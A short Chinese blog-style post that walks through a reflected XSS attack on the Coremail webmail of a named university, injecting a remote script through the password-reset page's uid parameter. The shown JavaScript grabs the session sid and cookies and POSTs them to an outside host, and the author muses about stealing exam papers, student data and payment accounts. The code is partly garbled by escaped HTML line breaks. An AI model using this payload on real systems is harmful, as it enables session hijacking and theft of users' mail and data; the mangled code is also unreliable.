写代码我真的是小菜鸟 估计很多地方语法错误,大家将就着看吧..

浏览器的bypass我就不说了 我的方法在IE8下无法实现的.

1、首先在http://mail.bnu.edu.cn/coremail/forgetpwd1.jsp?
uid=%22%3E%3Cscript%20src=http://files.cnblogs.com/xsser/coremail.js%3E%3C/script%3E

注入自己的代码。

2、比如

因为在coremail里 验证是靠sid来进行的。但是sid是写在链接里的 当然cookie里也有个叫coremail.sid。。。。呵呵呵
其实coremail作为各大高校常用的mail系统。其csrf也是比较都的，搞定mail就可以搞定试卷…全校数据信息…各种*&……#@！ 你懂的！要是能刷个支付宝啥的 钱虽然比较少，但是全部搞起来的话也够你大学4年白吃白喝了，不过这个是非法的事情，注意刑法的修改条例了。
然后加载的js为：

var my_post = "";
var b,c,d,mail_cookies;
var xhr;
document.write("<iframe height="0" id="hacker" name="hacker" src=" 
 width="0">");&lt;br&gt; b = document.frames["hacker"].document.getElementsByName("indexFrame");&lt;
 br&gt; c = b.split(/gmain\.jsp\?sid\=/);&lt;br&gt; mail_cookies = document.cookie;&lt;br&gt; 
 function xhr(){&lt;br&gt; if (window.XMLHttpRequest)&lt;br&gt; {&lt;br&gt; xhr=new XMLHttpRequest();
 &lt;br&gt; }&lt;br&gt; else&lt;br&gt; {&lt;br&gt; xhr=new ActiveXObject("Microsoft.XMLHTTP");&lt;br&gt;
  }&lt;br&gt; }&lt;br&gt; function callback(){&lt;br&gt; if (xhr.readyState == 4) {&lt;br&gt; 
  if (xhr.status == 200 ) {&lt;br&gt; alert(/you r hacked /.source);&lt;br&gt; }&lt;br&gt; }&lt;br&gt; }&lt;br&gt; function inject(){&lt;br&gt; xhr();&lt;br&gt; xhr.open("POST","http://www.blackh4t.org/receive.php",true);&lt;br&gt; xhr.onreadystatechange = callback;&lt;br&gt; xhr.send(mail_cookies + "&lt;br&gt; " + c);&lt;br&gt; }&lt;br&gt; xhr();&lt;br&gt; inject();</iframe>